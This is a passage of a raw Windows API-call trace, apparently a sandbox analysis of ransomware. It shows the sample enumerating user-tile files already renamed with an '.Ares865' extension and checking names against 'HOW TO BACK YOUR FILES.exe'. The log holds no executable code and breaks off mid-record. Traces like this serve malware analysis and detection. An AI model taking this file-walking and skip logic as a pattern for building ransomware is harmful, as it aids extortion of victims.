0x2ccee8 [0090.210] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.210] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.210] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile10.bmp.Ares865" | out: lpString1="usertile10.bmp.Ares865") returned="usertile10.bmp.Ares865" [0090.210] lstrlenW (lpString="usertile10.bmp.Ares865") returned 22 [0090.210] lstrlenW (lpString="Ares865") returned 7 [0090.210] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.210] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae24f474, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae24f474, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x63f7f960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile11.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.211] lstrcmpiW (lpString1="usertile11.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.211] lstrcmpiW (lpString1="usertile11.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.211] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile11.bmp.Ares865" | out: lpString1="usertile11.bmp.Ares865") returned="usertile11.bmp.Ares865" [0090.211] lstrlenW (lpString="usertile11.bmp.Ares865") returned 22 [0090.211] lstrlenW (lpString="Ares865") returned 7 [0090.211] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.211] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2755d1, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2755d1, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x63fa5ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile12.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.211] lstrcmpiW (lpString1="usertile12.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.211] lstrcmpiW (lpString1="usertile12.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.211] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile12.bmp.Ares865" | out: lpString1="usertile12.bmp.Ares865") returned="usertile12.bmp.Ares865" [0090.211] lstrlenW (lpString="usertile12.bmp.Ares865") returned 22 [0090.211] lstrlenW (lpString="Ares865") returned 7 [0090.211] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.211] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae29b72e, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae29b72e, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x63ff1d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc1c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile13.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.211] lstrcmpiW (lpString1="usertile13.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.211] lstrcmpiW (lpString1="usertile13.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.211] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile13.bmp.Ares865" | out: lpString1="usertile13.bmp.Ares865") returned="usertile13.bmp.Ares865" [0090.211] lstrlenW (lpString="usertile13.bmp.Ares865") returned 22 [0090.211] lstrlenW (lpString="Ares865") returned 7 [0090.211] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.211] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x64017ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile14.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.211] lstrcmpiW (lpString1="usertile14.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.211] lstrcmpiW (lpString1="usertile14.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.211] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile14.bmp.Ares865" | out: lpString1="usertile14.bmp.Ares865") returned="usertile14.bmp.Ares865" [0090.211] lstrlenW (lpString="usertile14.bmp.Ares865") returned 22 [0090.211] lstrlenW (lpString="Ares865") returned 7 [0090.211] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.212] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x640641a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile15.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.212] lstrcmpiW (lpString1="usertile15.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.212] lstrcmpiW (lpString1="usertile15.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.212] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile15.bmp.Ares865" | out: lpString1="usertile15.bmp.Ares865") returned="usertile15.bmp.Ares865" [0090.212] lstrlenW (lpString="usertile15.bmp.Ares865") returned 22 [0090.212] lstrlenW (lpString="Ares865") returned 7 [0090.212] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.212] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae30db45, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae30db45, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x6408a300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile16.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.212] lstrcmpiW (lpString1="usertile16.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.212] lstrcmpiW (lpString1="usertile16.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.212] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile16.bmp.Ares865" | out: lpString1="usertile16.bmp.Ares865") returned="usertile16.bmp.Ares865" [0090.212] lstrlenW (lpString="usertile16.bmp.Ares865") returned 22 [0090.212] lstrlenW (lpString="Ares865") returned 7 [0090.212] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.212] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x640b0460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile17.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.212] lstrcmpiW (lpString1="usertile17.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.212] lstrcmpiW (lpString1="usertile17.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.212] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile17.bmp.Ares865" | out: lpString1="usertile17.bmp.Ares865") returned="usertile17.bmp.Ares865" [0090.212] lstrlenW (lpString="usertile17.bmp.Ares865") returned 22 [0090.212] lstrlenW (lpString="Ares865") returned 7 [0090.212] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.212] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x640d65c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile18.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.212] lstrcmpiW (lpString1="usertile18.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.212] lstrcmpiW (lpString1="usertile18.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.212] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile18.bmp.Ares865" | out: lpString1="usertile18.bmp.Ares865") returned="usertile18.bmp.Ares865" [0090.212] lstrlenW (lpString="usertile18.bmp.Ares865") returned 22 [0090.212] lstrlenW (lpString="Ares865") returned 7 [0090.212] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.213] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae359dff, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae359dff, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x64122880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile19.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.213] lstrcmpiW (lpString1="usertile19.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.213] lstrcmpiW (lpString1="usertile19.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.213] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile19.bmp.Ares865" | out: lpString1="usertile19.bmp.Ares865") returned="usertile19.bmp.Ares865" [0090.213] lstrlenW (lpString="usertile19.bmp.Ares865") returned 22 [0090.213] lstrlenW (lpString="Ares865") returned 7 [0090.213] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.213] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae37ff5c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae37ff5c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x641489e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile20.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.213] lstrcmpiW (lpString1="usertile20.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.213] lstrcmpiW (lpString1="usertile20.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.213] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile20.bmp.Ares865" | out: lpString1="usertile20.bmp.Ares865") returned="usertile20.bmp.Ares865" [0090.213] lstrlenW (lpString="usertile20.bmp.Ares865") returned 22 [0090.213] lstrlenW (lpString="Ares865") returned 7 [0090.213] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.213] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x6416eb40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile21.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.213] lstrcmpiW (lpString1="usertile21.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.213] lstrcmpiW (lpString1="usertile21.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.213] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile21.bmp.Ares865" | out: lpString1="usertile21.bmp.Ares865") returned="usertile21.bmp.Ares865" [0090.213] lstrlenW (lpString="usertile21.bmp.Ares865") returned 22 [0090.213] lstrlenW (lpString="Ares865") returned 7 [0090.213] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.213] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x641bae00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile22.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.213] lstrcmpiW (lpString1="usertile22.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.213] lstrcmpiW (lpString1="usertile22.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.213] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile22.bmp.Ares865" | out: lpString1="usertile22.bmp.Ares865") returned="usertile22.bmp.Ares865" [0090.213] lstrlenW (lpString="usertile22.bmp.Ares865") returned 22 [0090.213] lstrlenW (lpString="Ares865") returned 7 [0090.213] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.214] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3cc216, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3cc216, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x641e0f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile23.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.214] lstrcmpiW (lpString1="usertile23.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.214] lstrcmpiW (lpString1="usertile23.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.214] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile23.bmp.Ares865" | out: lpString1="usertile23.bmp.Ares865") returned="usertile23.bmp.Ares865" [0090.214] lstrlenW (lpString="usertile23.bmp.Ares865") returned 22 [0090.214] lstrlenW (lpString="Ares865") returned 7 [0090.214] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.214] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x6422d220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile24.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.214] lstrcmpiW (lpString1="usertile24.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.214] lstrcmpiW (lpString1="usertile24.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.214] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile24.bmp.Ares865" | out: lpString1="usertile24.bmp.Ares865") returned="usertile24.bmp.Ares865" [0090.214] lstrlenW (lpString="usertile24.bmp.Ares865") returned 22 [0090.214] lstrlenW (lpString="Ares865") returned 7 [0090.214] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.214] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x642794e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile25.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.214] lstrcmpiW (lpString1="usertile25.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.214] lstrcmpiW (lpString1="usertile25.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.214] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile25.bmp.Ares865" | out: lpString1="usertile25.bmp.Ares865") returned="usertile25.bmp.Ares865" [0090.214] lstrlenW (lpString="usertile25.bmp.Ares865") returned 22 [0090.214] lstrlenW (lpString="Ares865") returned 7 [0090.214] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.214] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x6429f640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile26.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.214] lstrcmpiW (lpString1="usertile26.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.214] lstrcmpiW (lpString1="usertile26.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.214] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile26.bmp.Ares865" | out: lpString1="usertile26.bmp.Ares865") returned="usertile26.bmp.Ares865" [0090.214] lstrlenW (lpString="usertile26.bmp.Ares865") returned 22 [0090.214] lstrlenW (lpString="Ares865") returned 7 [0090.214] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.215] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4184d0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4184d0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x642eb900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile27.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.215] lstrcmpiW (lpString1="usertile27.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.215] lstrcmpiW (lpString1="usertile27.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.215] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile27.bmp.Ares865" | out: lpString1="usertile27.bmp.Ares865") returned="usertile27.bmp.Ares865" [0090.215] lstrlenW (lpString="usertile27.bmp.Ares865") returned 22 [0090.215] lstrlenW (lpString="Ares865") returned 7 [0090.215] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.215] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x64337bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile28.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.215] lstrcmpiW (lpString1="usertile28.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.215] lstrcmpiW (lpString1="usertile28.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.215] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile28.bmp.Ares865" | out: lpString1="usertile28.bmp.Ares865") returned="usertile28.bmp.Ares865" [0090.215] lstrlenW (lpString="usertile28.bmp.Ares865") returned 22 [0090.215] lstrlenW (lpString="Ares865") returned 7 [0090.215] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.215] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x643d0140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile29.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.215] lstrcmpiW (lpString1="usertile29.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.215] lstrcmpiW (lpString1="usertile29.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.215] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile29.bmp.Ares865" | out: lpString1="usertile29.bmp.Ares865") returned="usertile29.bmp.Ares865" [0090.215] lstrlenW (lpString="usertile29.bmp.Ares865") returned 22 [0090.215] lstrlenW (lpString="Ares865") returned 7 [0090.215] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.215] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae46478a, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae46478a, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x6441c400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile30.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.215] lstrcmpiW (lpString1="usertile30.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.215] lstrcmpiW (lpString1="usertile30.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.215] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile30.bmp.Ares865" | out: lpString1="usertile30.bmp.Ares865") returned="usertile30.bmp.Ares865" [0090.215] lstrlenW (lpString="usertile30.bmp.Ares865") returned 22 [0090.215] lstrlenW (lpString="Ares865") returned 7 [0090.215] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.216] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x64442560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile31.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.216] lstrcmpiW (lpString1="usertile31.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.216] lstrcmpiW (lpString1="usertile31.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.216] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile31.bmp.Ares865" | out: lpString1="usertile31.bmp.Ares865") returned="usertile31.bmp.Ares865" [0090.216] lstrlenW (lpString="usertile31.bmp.Ares865") returned 22 [0090.216] lstrlenW (lpString="Ares865") returned 7 [0090.216] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.216] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x644686c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile32.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.216] lstrcmpiW (lpString1="usertile32.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.216] lstrcmpiW (lpString1="usertile32.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.216] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile32.bmp.Ares865" | out: lpString1="usertile32.bmp.Ares865") returned="usertile32.bmp.Ares865" [0090.216] lstrlenW (lpString="usertile32.bmp.Ares865") returned 22 [0090.216] lstrlenW (lpString="Ares865") returned 7 [0090.216] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.216] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4b0a44, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4b0a44, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x644b4980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile33.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.216] lstrcmpiW (lpString1="usertile33.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.216] lstrcmpiW (lpString1="usertile33.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.216] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile33.bmp.Ares865" | out: lpString1="usertile33.bmp.Ares865") returned="usertile33.bmp.Ares865" [0090.216] lstrlenW (lpString="usertile33.bmp.Ares865") returned 22 [0090.216] lstrlenW (lpString="Ares865") returned 7 [0090.216] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.216] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, 